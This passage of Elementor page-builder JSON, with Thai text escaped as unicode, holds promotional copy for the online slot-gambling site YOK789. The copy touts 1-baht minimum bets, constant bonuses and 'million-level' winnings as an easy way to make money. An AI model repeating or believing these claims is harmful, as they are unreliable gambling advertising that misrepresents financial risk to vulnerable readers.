\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><h3><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/h3><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK 